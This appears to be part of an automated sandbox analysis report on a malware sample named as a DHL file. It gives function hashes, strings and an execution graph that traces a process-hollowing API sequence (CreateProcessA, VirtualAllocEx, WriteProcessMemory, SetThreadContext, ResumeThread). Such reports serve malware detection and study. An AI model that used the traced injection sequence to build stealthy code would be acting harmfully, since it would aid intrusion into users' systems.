                                                • Instruction ID: a9afc9081fadfdf4d8a6bf2e3737bba6eafc2a2bd4b62e980e37085b861e9220
                                                • Opcode Fuzzy Hash: eb2af81c06a3b34f63ed380a69ec8b46ef1ac6f0af004077cce5d62b6f910265
                                                • Instruction Fuzzy Hash: 5211F0B5C046498FCB10DF9AD544ADEFBF4AB48324F10842AD829A7250D379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0139D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2930727468.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_139d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c64e08184619d8e16d7b06fda13f5954f737237df974c6e38fa5f5b4d5678f9f
                                                • Instruction ID: 17550521faeadaa312685234d18cd189b66992312f81ce5bb431398cba16ec9c
                                                • Opcode Fuzzy Hash: c64e08184619d8e16d7b06fda13f5954f737237df974c6e38fa5f5b4d5678f9f
                                                • Instruction Fuzzy Hash: 6D212271604204DFDF15DF68D985B26BFA5FB84358F20C56DD80A4B356C33AD847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0139D017 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2930727468.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_139d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 02a344b8cfe56fcab7e431653ca212d38168679e9881913dceeacf39b1cb2ad9
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 0C119D75504280DFDB16CF58D5C4B16FFA2FB84318F24C6AAD8494B756C33AD44ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:234
                                                Total number of Limit Nodes:18
                                                execution_graph 39977 12a4668 39978 12a4672 39977->39978 39980 12a4759 39977->39980 39981 12a477d 39980->39981 39985 12a4858 39981->39985 39989 12a4868 39981->39989 39987 12a488f 39985->39987 39986 12a496c 39986->39986 39987->39986 39993 12a44b0 39987->39993 39990 12a488f 39989->39990 39991 12a496c 39990->39991 39992 12a44b0 CreateActCtxA 39990->39992 39992->39991 39994 12a58f8 CreateActCtxA 39993->39994 39996 12a59bb 39994->39996 40232 12aac08 40233 12aac17 40232->40233 40236 12aacef 40232->40236 40244 12aad00 40232->40244 40237 12aad11 40236->40237 40238 12aad34 40236->40238 40237->40238 40252 12ab388 40237->40252 40256 12ab398 40237->40256 40238->40233 40239 12aad2c 40239->40238 40240 12aaf38 GetModuleHandleW 40239->40240 40241 12aaf65 40240->40241 40241->40233 40245 12aad11 40244->40245 40246 12aad34 40244->40246 40245->40246 40250 12ab388 LoadLibraryExW 40245->40250 40251 12ab398 LoadLibraryExW 40245->40251 40246->40233 40247 12aad2c 40247->40246 40248 12aaf38 GetModuleHandleW 40247->40248 40249 12aaf65 40248->40249 40249->40233 40250->40247 40251->40247 40253 12ab3ac 40252->40253 40255 12ab3d1 40253->40255 40260 12aaf88 40253->40260 40255->40239 40257 12ab3ac 40256->40257 40258 12ab3d1 40257->40258 40259 12aaf88 LoadLibraryExW 40257->40259 40258->40239 40259->40258 40261 12ab558 LoadLibraryExW 40260->40261 40263 12ab5d1 40261->40263 40263->40255 40264 4c2ade0 40265 4c2af6b 40264->40265 40267 4c2ae06 40264->40267 40267->40265 40268 4c292a0 40267->40268 40269 4c2b060 PostMessageW 40268->40269 40270 4c2b0cc 40269->40270 40270->40267 40271 12ad098 40272 12ad0de 40271->40272 40276 12ad268 40272->40276 40279 12ad278 40272->40279 40273 12ad1cb 40282 12ab350 40276->40282 40280 12ad2a6 40279->40280 40281 12ab350 DuplicateHandle 40279->40281 40280->40273 40281->40280 40283 12ad2e0 DuplicateHandle 40282->40283 40285 12ad2a6 40283->40285 40285->40273 39997 4c27f85 40001 4c29bf1 39997->40001 40017 4c29c00 39997->40017 39998 4c27f94 40002 4c29c00 40001->40002 40012 4c29c3e 40002->40012 40033 4c2a243 40002->40033 40038 4c2a1bc 40002->40038 40043 4c2a759 40002->40043 40048 4c29f18 40002->40048 40054 4c2a374 40002->40054 40059 4c2a173 40002->40059 40064 4c2a6ec 40002->40064 40069 4c2a8c8 40002->40069 40074 4c2aac4 40002->40074 40078 4c2a2c6 40002->40078 40086 4c2a0e1 40002->40086 40092 4c2a361 40002->40092 40097 4c2a281 40002->40097 40012->39998 40018 4c29c1a 40017->40018 40019 4c2a243 2 API calls 40018->40019 40020 4c2a281 2 API calls 40018->40020 40021 4c2a361 2 API calls 40018->40021 40022 4c2a0e1 2 API calls 40018->40022 40023 4c2a2c6 4 API calls 40018->40023 40024 4c2aac4 2 API calls 40018->40024 40025 4c2a8c8 2 API calls 40018->40025 40026 4c2a6ec 2 API calls 40018->40026 40027 4c2a173 2 API calls 40018->40027 40028 4c29c3e 40018->40028 40029 4c2a374 2 API calls 40018->40029 40030 4c29f18 2 API calls 40018->40030 40031 4c2a759 2 API calls 40018->40031 40032 4c2a1bc 2 API calls 40018->40032 40019->40028 40020->40028 40021->40028 40022->40028 40023->40028 40024->40028 40025->40028 40026->40028 40027->40028 40028->39998 40029->40028 40030->40028 40031->40028 40032->40028 40034 4c2a244 40033->40034 40101 4c276d0 40034->40101 40105 4c276d8 40034->40105 40035 4c2a1b5 40035->40012 40039 4c2a1c2 40038->40039 40109 4c271f0 40039->40109 40113 4c271ea 40039->40113 40040 4c2a437 40044 4c2a822 40043->40044 40117 4c277b0 40044->40117 40121 4c277aa 40044->40121 40045 4c2a843 40049 4c29f5b 40048->40049 40050 4c2a01a 40049->40050 40125 4c27af8 40049->40125 40129 4c27aed 40049->40129 40050->40012 40055 4c2a397 40054->40055 40133 4c27870 40055->40133 40137 4c2786a 40055->40137 40056 4c2a5f5 40056->40012 40060 4c2a244 40059->40060 40062 4c276d0 Wow64SetThreadContext 40060->40062 40063 4c276d8 Wow64SetThreadContext 40060->40063 40061 4c2a1b5 40061->40012 40062->40061 40063->40061 40065 4c2a6f2 40064->40065 40067 4c27870 WriteProcessMemory 40065->40067 40068 4c2786a WriteProcessMemory 40065->40068 40066 4c2a20f 40067->40066 40068->40066 40070 4c2a703 40069->40070 40071 4c2a20f 40070->40071 40072 4c27870 WriteProcessMemory 40070->40072 40073 4c2786a WriteProcessMemory 40070->40073 40071->40012 40072->40071 40073->40071 40076 4c27870 WriteProcessMemory 40074->40076 40077 4c2786a WriteProcessMemory 40074->40077 40075 4c2aaeb 40076->40075 40077->40075 40082 4c276d0 Wow64SetThreadContext 40078->40082 40083 4c276d8 Wow64SetThreadContext 40078->40083 40079 4c2a1d3 40080 4c2a753 40079->40080 40084 4c271f0 ResumeThread 40079->40084 40085 4c271ea ResumeThread 40079->40085 40081 4c2a437 40082->40079 40083->40079 40084->40081 40085->40081 40087 4c2a01a 40086->40087 40088 4c29fba 40086->40088 40087->40012 40088->40087 40090 4c27af8 CreateProcessA 40088->40090 40091 4c27aed CreateProcessA 40088->40091 40089 4c2a128 40089->40012 40090->40089 40091->40089 40093 4c2a36e 40092->40093 40095 4c271f0 ResumeThread 40093->40095 40096 4c271ea ResumeThread 40093->40096 40094 4c2a437 40095->40094 40096->40094 40141 4c27960 40097->40141 40145 4c27958 40097->40145 40098 4c2a150 40098->40012 40102 4c2771d Wow64SetThreadContext 40101->40102 40104 4c27765 40102->40104 40104->40035 40106 4c2771d Wow64SetThreadContext 40105->40106 40108 4c27765 40106->40108 40108->40035 40110 4c27230 ResumeThread 40109->40110 40112 4c27261 40110->40112 40112->40040 40114 4c27230 ResumeThread 40113->40114 40116 4c27261 40114->40116 40116->40040 40118 4c277f0 VirtualAllocEx 40117->40118 40120 4c2782d 40118->40120 40120->40045 40122 4c277f0 VirtualAllocEx 40121->40122 40124 4c2782d 40122->40124 40124->40045 40126 4c27b81 40125->40126 40126->40126 40127 4c27ce6 CreateProcessA 40126->40127 40128 4c27d43 40127->40128 40128->40128 40130 4c27af9 CreateProcessA 40129->40130 40132 4c27d43 40130->40132 40134 4c278b8 WriteProcessMemory 40133->40134 40136 4c2790f 40134->40136 40136->40056 40138 4c278b8 WriteProcessMemory 40137->40138 40140 4c2790f 40138->40140 40140->40056 40142 4c279ab ReadProcessMemory 40141->40142 40144 4c279ef 40142->40144 40144->40098 40146 4c279ab ReadProcessMemory 40145->40146 40148 4c279ef 40146->40148 40148->40098 40149 6d2a608 40153 6d2a640 40149->40153 40157 6d2a630 40149->40157 40150 6d2a627 40154 6d2a649 40153->40154 40161 6d2a678 40154->40161 40155 6d2a66e 40155->40150 40158 6d2a649 40157->40158 40160 6d2a678 DrawTextExW 40158->40160 40159 6d2a66e 40159->40150 40160->40159 40162 6d2a6c3 40161->40162 40163 6d2a6b2 40161->40163 40164 6d2a751 40162->40164 40167 6d2a9b0 40162->40167 40172 6d2a9a1 40162->40172 40163->40155 40164->40155 40168 6d2a9d8 40167->40168 40169 6d2aade 40168->40169 40177 6d2b248 40168->40177 40182 6d2b238 40168->40182 40169->40163 40173 6d2a9b1 40172->40173 40174 6d2aade 40173->40174 40175 6d2b248 DrawTextExW 40173->40175 40176 6d2b238 DrawTextExW 40173->40176 40174->40163 40175->40174 40176->40174 40178 6d2b25e 40177->40178 40187 6d2b6a3 40178->40187 40192 6d2b6b0 40178->40192 40179 6d2b2d4 40179->40169 40183 6d2b25e 40182->40183 40185 6d2b6a3 DrawTextExW 40183->40185 40186 6d2b6b0 DrawTextExW 40183->40186 40184 6d2b2d4 40184->40169 40185->40184 40186->40184 40188 6d2b6ad 40187->40188 40189 6d2b6ce 40188->40189 40196 6d2b6f0 40188->40196 40201 6d2b6e1 40188->40201 40189->40179 40194 6d2b6f0 DrawTextExW 40192->40194 40195 6d2b6e1 DrawTextExW 40192->40195 40193 6d2b6ce 40193->40179 40194->40193 40195->40193 40197 6d2b721 40196->40197 40198 6d2b74e 40197->40198 40206 6d2b770 40197->40206 40211 6d2b760 40197->40211 40198->40189 40202 6d2b721 40201->40202 40203 6d2b74e 40202->40203 40204 6d2b770 DrawTextExW 40202->40204 40205 6d2b760 DrawTextExW 40202->40205 40203->40189 40204->40203 40205->40203 40208 6d2b791 40206->40208 40207 6d2b7a6 40207->40198 40208->40207 40216 6d28fec 40208->40216 40210 6d2b811 40213 6d2b791 40211->40213 40212 6d2b7a6 40212->40198 40213->40212 40214 6d28fec DrawTextExW 40213->40214 40215 6d2b811 40214->40215 40218 6d28ff7 40216->40218 40217 6d2d7e9 40217->40210 40218->40217 40222 6d2e360 40218->40222 40225 6d2e34f 40218->40225 40219 6d2d8fc 40219->40210 40223 6d2e37d 40222->40223 40228 6d2cdb4 40222->40228 40223->40219 40226 6d2cdb4 DrawTextExW 40225->40226 40227 6d2e37d 40226->40227 40227->40219 40229 6d2e398 DrawTextExW 40228->40229 40231 6d2e43e 40229->40231 40231->40223

                                                Executed Functions

                                                Function 06FC4560 Relevance: 4.1, Strings: 3, Instructions: 304COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 904 6fc4560-6fc4570 905 6fc45b1-6fc45c5 904->905 906 6fc4572-6fc458c 904->906 909 6fc45c6-6fc45cd 905->909 907 6fc458e-6fc45a4 906->907 908 6fc45d2-6fc45e0 906->908 910 6fc45e3-6fc45e8 907->910 911 6fc45a6-6fc45b0 907->911 908->910 912 6fc45ce-6fc45d0 909->912 910->912 913 6fc45ea-6fc45f0 910->913 911->905 912->908 913->909 914 6fc45f3-6fc461b 913->914 916 6fc461d 914->916 917 6fc4622-6fc4698 914->917 916->917 922 6fc469b 917->922 923 6fc46a2-6fc46be 922->923 924 6fc46c7-6fc46c8 923->924 925 6fc46c0 923->925 934 6fc4816-6fc4886 924->934 925->922 925->924 926 6fc46cd-6fc46e2 925->926 927 6fc479e-6fc47d4 925->927 928 6fc476f-6fc4799 925->928 929 6fc4728-6fc472c 925->929 930 6fc4758-6fc476a 925->930 931 6fc47d9-6fc47f5 925->931 932 6fc47fa-6fc4811 925->932 933 6fc46e4-6fc4700 925->933 925->934 926->923 927->923 928->923 935 6fc472e-6fc473d 929->935 936 6fc473f-6fc4746 929->936 930->923 931->923 932->923 943 6fc4708-6fc4723 933->943 948 6fc4888 call 6fc5e6c 934->948 949 6fc4888 call 6fc58d8 934->949 950 6fc4888 call 6fc5ee4 934->950 951 6fc4888 call 6fc6526 934->951 938 6fc474d-6fc4753 935->938 936->938 938->923 943->923 947 6fc488e-6fc4898 948->947 949->947 950->947 951->947
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 5dae965cdb4928d2f70adc89a391720e0aa2688f1fd29eeb839e72e37bc542f3
                                                • Instruction ID: 6b27735a58006237c840bcfc6a55bdb28d05cd03f6101be41bd8c39e9396797b
                                                • Opcode Fuzzy Hash: 5dae965cdb4928d2f70adc89a391720e0aa2688f1fd29eeb839e72e37bc542f3
                                                • Instruction Fuzzy Hash: 34A14A75E016099FCB08CFA9C9909DEFBF6FF89310F10852AE416AB254D7345906CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC45F8 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 952 6fc45f8-6fc461b 953 6fc461d 952->953 954 6fc4622-6fc4698 952->954 953->954 959 6fc469b 954->959 960 6fc46a2-6fc46be 959->960 961 6fc46c7-6fc46c8 960->961 962 6fc46c0 960->962 971 6fc4816-6fc4886 961->971 962->959 962->961 963 6fc46cd-6fc46e2 962->963 964 6fc479e-6fc47d4 962->964 965 6fc476f-6fc4799 962->965 966 6fc4728-6fc472c 962->966 967 6fc4758-6fc476a 962->967 968 6fc47d9-6fc47f5 962->968 969 6fc47fa-6fc4811 962->969 970 6fc46e4-6fc4700 962->970 962->971 963->960 964->960 965->960 972 6fc472e-6fc473d 966->972 973 6fc473f-6fc4746 966->973 967->960 968->960 969->960 980 6fc4708-6fc4723 970->980 985 6fc4888 call 6fc5e6c 971->985 986 6fc4888 call 6fc58d8 971->986 987 6fc4888 call 6fc5ee4 971->987 988 6fc4888 call 6fc6526 971->988 975 6fc474d-6fc4753 972->975 973->975 975->960 980->960 984 6fc488e-6fc4898 985->984 986->984 987->984 988->984
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 8c172183150f41c0f97191ef0cb047fc67e5a210b25b73f209bf89f28f9ab7af
                                                • Instruction ID: d62f5575c3e194692e881ce8bd86e47b041339ca63ba786947f2c25949d0e295
                                                • Opcode Fuzzy Hash: 8c172183150f41c0f97191ef0cb047fc67e5a210b25b73f209bf89f28f9ab7af
                                                • Instruction Fuzzy Hash: 8081C274E006098FDB48CFAAC994AAEFBF2BF89310F14942AD515AB358D7349905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC66F9 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 85bf270996e5601cc735acf4795906762ed8c9b43585ba72d4eff4132d02c63a
                                                • Instruction ID: 5019ad3b407a54f8843c641de5a403cdadead24a477874ee11ff1b7c0879b5d7
                                                • Opcode Fuzzy Hash: 85bf270996e5601cc735acf4795906762ed8c9b43585ba72d4eff4132d02c63a
                                                • Instruction Fuzzy Hash: 29E18E71D0920ADFDB44CFA9C6808AEFBB2FF89310B14D559D512EB255D734AA42CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC6715 Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 0a38d78a1eb17f09e067544c7e090167397a80f5c708218b8737b4887118f845
                                                • Instruction ID: eaee5fc8c2541318c1e357e05b327edba17c81de175a95d505a7d72b7f8d1e93
                                                • Opcode Fuzzy Hash: 0a38d78a1eb17f09e067544c7e090167397a80f5c708218b8737b4887118f845
                                                • Instruction Fuzzy Hash: 07E16C71D0920ADFDB44CFA9C6808AEFBB2FF89310B10D559D512EB255D734AA42CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC6756 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 27b1e18b00ec7d5845db4f1c41960f2ea836722764a12334e025f5b717618648
                                                • Instruction ID: f3bda160a2225c4395d71487eb4c8d5a188ca63a392fadc6817c93d544029cae
                                                • Opcode Fuzzy Hash: 27b1e18b00ec7d5845db4f1c41960f2ea836722764a12334e025f5b717618648
                                                • Instruction Fuzzy Hash: 4AD16B71D0920ADFDB44CFA9C6848AEFBB2FF89310B10D559D512EB254D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC6798 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: b3499004b0924a40127f5d1fea7c5f8cad19da24d0541873f53bd7d4d26030c9
                                                • Instruction ID: 128448a5da3347d56b4475f3fd1a4535bb64dbf9dc1f41b68dd14b4d85c4e26f
                                                • Opcode Fuzzy Hash: b3499004b0924a40127f5d1fea7c5f8cad19da24d0541873f53bd7d4d26030c9
                                                • Instruction Fuzzy Hash: A5D12770D0920ADFDB44CFA9C6848AEFBB2FF89310B10D559D516EB294D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC3AD8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 429d6ff1b127242d08127676d6df108dfd183a52e0d497b1bead5d05ae02f306
                                                • Instruction ID: fcb09e27ff4c3b3bfa62315afc6f14263a3aae5d06fe4c187d2bd9da49adad89
                                                • Opcode Fuzzy Hash: 429d6ff1b127242d08127676d6df108dfd183a52e0d497b1bead5d05ae02f306
                                                • Instruction Fuzzy Hash: 42315A71E056189FDB58CFABD95079EFBF7AFC9210F14C0AAE409A7210EB304A518F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC9830 Relevance: .2, Instructions: 241COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed127587ecc22b2b9729688ca070be5db97b91a9620cda2613da776d0fe17566
                                                • Instruction ID: 8d4956880aa768ddf80d87894ed44a9508aba93b83f668257456cb6ad6a74cc4
                                                • Opcode Fuzzy Hash: ed127587ecc22b2b9729688ca070be5db97b91a9620cda2613da776d0fe17566
                                                • Instruction Fuzzy Hash: 17A12671E05209EFDB48CFA5D68099DFBB2FB89320F20A41AE016BB228D7749905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC9519 Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acdf6cef21acc22af8286b88f1550b35fce9a94549c815dc06691ac654cf2f06
                                                • Instruction ID: 03e02503ba25670cc32ff89d8f6e8d52144e7eaafefecbee9943cd3b84a6b542
                                                • Opcode Fuzzy Hash: acdf6cef21acc22af8286b88f1550b35fce9a94549c815dc06691ac654cf2f06
                                                • Instruction Fuzzy Hash: F3812275E0421ACFDB44CFA9C9409EEFBB2FB89310F10985AD801A7354D7789916CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC9528 Relevance: .2, Instructions: 204COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90190985c1ec070900e1b4dfa207554f1aecc056f298b7dfee53891981a25de7
                                                • Instruction ID: e08a5d5228e3b9f1b9cbcc917f3d30fef412593f3dff5f676d418b5e1a53de9d
                                                • Opcode Fuzzy Hash: 90190985c1ec070900e1b4dfa207554f1aecc056f298b7dfee53891981a25de7
                                                • Instruction Fuzzy Hash: EB81F075E0421ACFDB44CFA9C9809AEFBB2FB89311F10991AD801A7254D7789916CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC58D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d25a950aa487f9b40d045c298645e5ca13683d3c3cb4f589e0230f694a4b9c03
                                                • Instruction ID: 29eab038ca39cf1c05b56c77e7dea9806efe46fc3f6e305e09733e37496b8451
                                                • Opcode Fuzzy Hash: d25a950aa487f9b40d045c298645e5ca13683d3c3cb4f589e0230f694a4b9c03
                                                • Instruction Fuzzy Hash: AC21F8B1E056598FEB18CFAAC9442DEFBF3EFC9310F14C06AD509AA258DB701A45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC1DC8 Relevance: 16.5, Strings: 13, Instructions: 282COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 6fc1dc8 295 6fc1dcd-6fc1dd0 294->295 296 6fc1de2-6fc1de6 295->296 297 6fc1dd2 295->297 309 6fc1de8-6fc1df1 296->309 310 6fc1e09 296->310 297->296 298 6fc209c-6fc20b2 297->298 299 6fc1ebc-6fc1ec0 297->299 300 6fc1faf-6fc1fc2 297->300 301 6fc2058-6fc206b 297->301 302 6fc2179-6fc2182 297->302 303 6fc204b-6fc2053 297->303 304 6fc1e9b-6fc1ea5 297->304 305 6fc2114-6fc213e 297->305 306 6fc1f60-6fc1f64 297->306 307 6fc2092-6fc2097 297->307 308 6fc2162-6fc2176 297->308 343 6fc20c8 298->343 344 6fc20b4-6fc20c6 298->344 315 6fc1ec2-6fc1ecb 299->315 316 6fc1ee3 299->316 314 6fc2185-6fc219f 300->314 338 6fc1fc8-6fc1fd0 300->338 335 6fc206d-6fc2074 301->335 336 6fc208b-6fc2090 301->336 303->295 313 6fc1eab-6fc1eb7 304->313 304->314 379 6fc214a-6fc2154 305->379 380 6fc2140 305->380 311 6fc1f66-6fc1f6f 306->311 312 6fc1f87 306->312 307->295 317 6fc1df8-6fc1e05 309->317 318 6fc1df3-6fc1df6 309->318 319 6fc1e0c-6fc1e0e 310->319 321 6fc1f76-6fc1f83 311->321 322 6fc1f71-6fc1f74 311->322 323 6fc1f8a-6fc1faa 312->323 313->295 326 6fc1ecd-6fc1ed0 315->326 327 6fc1ed2-6fc1edf 315->327 330 6fc1ee6-6fc1eea 316->330 329 6fc1e07 317->329 318->329 332 6fc1e26-6fc1e43 319->332 333 6fc1e10-6fc1e16 319->333 334 6fc1f85 321->334 322->334 323->295 337 6fc1ee1 326->337 327->337 329->319 341 6fc1eec-6fc1efe 330->341 342 6fc1f00 330->342 358 6fc1e45-6fc1e4e 332->358 359 6fc1e66 332->359 345 6fc1e18 333->345 346 6fc1e1a-6fc1e24 333->346 334->323 335->314 351 6fc207a-6fc2081 335->351 352 6fc2086 336->352 337->330 354 6fc1fd2-6fc1fdb 338->354 355 6fc1ff3 338->355 356 6fc1f03-6fc1f07 341->356 342->356 357 6fc20cb-6fc20d8 343->357 344->357 345->332 346->332 351->352 352->295 360 6fc1fdd-6fc1fe0 354->360 361 6fc1fe2-6fc1fef 354->361 362 6fc1ff6-6fc1ff8 355->362 363 6fc1f28 356->363 364 6fc1f09-6fc1f12 356->364 385 6fc20da-6fc20e0 357->385 386 6fc20f0-6fc20fd 357->386 367 6fc1e55-6fc1e62 358->367 368 6fc1e50-6fc1e53 358->368 369 6fc1e69-6fc1e92 call 6fc34ef 359->369 371 6fc1ff1 360->371 361->371 372 6fc1ffa-6fc2000 362->372 373 6fc2016 362->373 366 6fc1f2b-6fc1f4c 363->366 374 6fc1f19-6fc1f1c 364->374 375 6fc1f14-6fc1f17 364->375 366->314 399 6fc1f52-6fc1f5b 366->399 377 6fc1e64 367->377 368->377 403 6fc1e98 369->403 371->362 382 6fc2006-6fc2012 372->382 383 6fc2002-6fc2004 372->383 378 6fc2018-6fc201a 373->378 384 6fc1f26 374->384 375->384 377->369 392 6fc201c-6fc2022 378->392 393 6fc2034-6fc2046 378->393 379->314 397 6fc2156-6fc2160 379->397 396 6fc2145 380->396 387 6fc2014 382->387 383->387 384->366 388 6fc20e4-6fc20e6 385->388 389 6fc20e2 385->389 386->314 390 6fc2103-6fc210f 386->390 387->378 388->386 389->386 390->295 400 6fc2024 392->400 401 6fc2026-6fc2032 392->401 393->295 396->295 397->396 399->295 400->393 401->393 403->304
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-1437089595
                                                • Opcode ID: 19653b2bef41d327c468d7b1bf57d9da4ea0963dbb61f7a038c67e4a7c016833
                                                • Instruction ID: 8e84084d9baea2e0e3f968c2a55b4a4005bef8417099d8829c716ee5c2cc795e
                                                • Opcode Fuzzy Hash: 19653b2bef41d327c468d7b1bf57d9da4ea0963dbb61f7a038c67e4a7c016833
